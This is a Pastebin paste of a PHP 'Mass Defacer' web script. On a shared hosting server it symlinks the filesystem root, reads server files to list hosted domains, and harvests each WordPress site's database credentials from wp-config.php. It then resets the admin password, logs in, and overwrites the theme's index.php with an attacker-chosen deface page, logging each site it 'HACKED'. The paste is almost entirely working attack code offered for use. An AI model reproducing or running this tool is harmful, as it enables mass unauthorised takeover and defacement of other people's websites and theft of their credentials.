API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 20th, 2017
52
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.32 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. ini_set("display_errors", "0");
  3. set_time_limit(0);
  4. @session_start();
  5. $base_path = dirname(__FILE__).'/';
  6.  
  7.  
  8. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  9. $ar0=explode($marqueurDebutLien, $text);
  10. $ar1=explode($marqueurFinLien, $ar0[$i]);
  11. return trim($ar1[0]);
  12. }
  13.  
  14. function randomt() {
  15. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  16. srand((double)microtime()*1000000);
  17. $i = 0;
  18. $pass = '';
  19. while ($i <= 7) {
  20. $num = rand() % 33;
  21. $tmp = substr($chars, $num, 1);
  22. $pass = $pass . $tmp;
  23. $i++;
  24. }
  25. return $pass;
  26. }
  27.  
  28. function index_changer_wp($conf, $content) {
  29. $output = '';
  30. $dol = '$';
  31. $username = entre2v2($conf,"define('DB_USER', '","');");
  32. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  33. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  34. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  35. $host = entre2v2($conf,"define('DB_HOST', '","');");
  36.  
  37. $link=mysql_connect($host,$username,$password);
  38. if($link) {
  39. mysql_select_db($dbname,$link) ;
  40. $dol = '$';
  41. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '0a56f86a4ea789f555c2bdfafb61fd4a' WHERE `ID` = 1");
  42. } else {
  43. $output.= "[-] DB Error<br />";
  44. }
  45. if($req1) {
  46.  
  47. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  48. $data = mysql_fetch_array($req);
  49. $site_url=$data["option_value"];
  50.  
  51. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  52. $data = mysql_fetch_array($req);
  53. $template = $data["option_value"];
  54.  
  55. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  56. $data = mysql_fetch_array($req);
  57. $current_theme = $data["option_value"];
  58.  
  59. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  60. $url2=$site_url."/wp-login.php";
  61.  
  62. $ch = curl_init();
  63. curl_setopt($ch, CURLOPT_URL, $url2);
  64. curl_setopt($ch, CURLOPT_POST, 1);
  65. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=slymn123&rememberme=forever&wp-submit=Log In&testcookie=1");
  66. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  67. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  68. curl_setopt($ch, CURLOPT_HEADER, 0);
  69. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  70. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  71. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  72. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  73. $buffer = curl_exec($ch);
  74.  
  75. $pos = strpos($buffer,"action=logout");
  76. if($pos === false) {
  77. $output.= "[-] Successful Login<br />";
  78. } else {
  79. $output.= "[+] Successful Login<br />";
  80. }
  81.  
  82. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  83. curl_setopt($ch, CURLOPT_URL, $url2);
  84. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  85. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  86. curl_setopt($ch, CURLOPT_HEADER, 0);
  87. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  88. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  89. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  90. $buffer0 = curl_exec($ch);
  91.  
  92. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  93. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  94.  
  95. if(substr_count($_file,"/index.php") != 0){
  96. $output.= "[+] index.php Opened<br />";
  97. } else {
  98. $output.= "[-] index.php Unable to open<br />";
  99. }
  100.  
  101. $url2=$site_url."/wp-admin/theme-editor.php";
  102. curl_setopt($ch, CURLOPT_URL, $url2);
  103. curl_setopt($ch, CURLOPT_POST, 1);
  104. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  105. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  106. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  107. curl_setopt($ch, CURLOPT_HEADER, 0);
  108. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  109. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  110. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  111. $buffer = curl_exec($ch);
  112. curl_close($ch);
  113.  
  114. $pos = strpos($buffer,'<div id="message" class="updated">');
  115. $cond = 0;
  116. if($pos === false) {
  117. $output.= "[-] index.php Failed<br />";
  118. } else {
  119. $output.= "[+] index.php Failed+<br />";
  120. $cond = 1;
  121. }
  122. } else {
  123. $output.= "[-] DB Error<br />";
  124. }
  125. global $base_path;
  126. unlink($base_path.'COOKIE.txt');
  127. return array('cond'=>$cond, 'output'=>$output);
  128. }
  129.  
  130. function exec_mode_1($def_url) {
  131.  
  132. @mkdir('sym',0777);
  133. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  134. $fp = @fopen ('sym/.htaccess','w');
  135. fwrite($fp, $wr);
  136. @symlink('/','sym/root');
  137. $dominios = @file_get_contents("/etc/named.conf");
  138. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  139. $out[1] = array_unique($out[1]);
  140. $numero_dominios = count($out[1]);
  141. echo "Total Websites: $numero_dominios <br><br />";
  142. $def = file_get_contents($def_url);
  143. $def = urlencode($def);
  144. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  145. $output = fopen('defaced.html', 'a+');
  146. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  147. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  148. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Script</th><th>Process</th><th>Results</th></tr>';
  149. $j = 1;
  150. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  151. for($i = $st; $i <= $numero_dominios; $i++)
  152. {
  153. $domain = $out[1][$i];
  154. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  155. $infos = @posix_getpwuid($dono_arquivo);
  156.  
  157. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  158.  
  159. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  160.  
  161. if($config02 && preg_match('/DB_NAME/i',$config02)){
  162. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  163. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  164. $res = index_changer_wp($config02, $def);
  165. echo '<td>'.$res['output'].'</td>';
  166. if($res['cond']) {
  167. echo '<td align="center"><span class="green">HACKED</span></td>';
  168. fwrite($output, 'http://'.$domain."<br>");
  169. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  170. } else {
  171. echo '<td align="center"><span class="red">unsuccessful</span></td>';
  172. }
  173. echo '</tr>';
  174. }
  175. }
  176. echo '</table>';
  177. echo '<hr/>';
  178. echo 'Total Deface = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
  179. echo '<a href="defaced.html" target="_blank">List Websites Defaced</a><br />';
  180. }
  181.  
  182. echo '<!DOCTYPE html>
  183. <html>
  184.  
  185. <head>
  186. <title>Mass Defacer 1.0</title>
  187.  
  188. <p>
  189.  
  190. <h1 style="color:#FF0000;text-align: center;">Mass Defacer</h1>
  191. <style type="text/css">
  192. body {color: white; background: #000 url(http://img02.deviantart.net/0593/i/2011/130/b/3/portugal_flag_wallpaper_by_anonymouscreative-d3g1qvl.jpg) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  193. .header {position:fixed;width:100%;top:0;background:#000;}
  194. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  195. input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
  196. input[type="submit"]:hover{color:SeaShell;}
  197. input[type="radio"]{margin-top: 0;}
  198. .even {background-color: rgba(25, 25, 25, 0.6);}
  199. .odd {background-color: rgba(102, 102, 102, 0.6);}
  200. a {color:#fff;} a:hover {color:#00BFFF;}
  201. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  202. textarea{background: rgba(0,0,0,0.6); color: white;}
  203. .green {color:#00FF00;font-weight:bold;}
  204. .red {color:#FF0000;font-weight:bold;}
  205. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  206. </style></p>
  207. <script type="text/javascript">
  208. function change() {
  209. if(document.getElementById(\'rcd\').checked == true) {
  210. document.getElementById(\'tra\').style.display = \'\';
  211. } else {
  212. document.getElementById(\'tra\').style.display = \'none\';
  213. }
  214. }
  215. function hide() {
  216. document.getElementById(\'tra\').style.display = \'none\';
  217. }
  218. </script>
  219. </head>
  220. <body>
  221. <div class="footer">
  222. <h3 style="text-align: center;">Coded By khaloN</h3>
  223. </div>
  224. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  225. ';
  226. if(!isset($_POST['form_action'])){
  227. echo '<div align="center">
  228. <form action="" method="post">
  229. <br> </br>
  230. <input type="hidden" name="form_action" value="1"><br>Index URL:
  231. <input type="text" name="indexadresi" value="http://site.com/index.html" /><br>
  232.  
  233. <br><input class=submit type="submit" value="DEFACE" name="Submit"></br>
  234. </form>
  235. </div>';
  236. }
  237. echo '<div align="center">';
  238. if($_POST['form_action'] == 1) {
  239. exec_mode_1($_POST['indexadresi']);
  240. }
  241. echo '</div>
  242. </div>
  243.  
  244.  
  245.  
  246.  
  247. </body>
  248. </html>';
  249. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!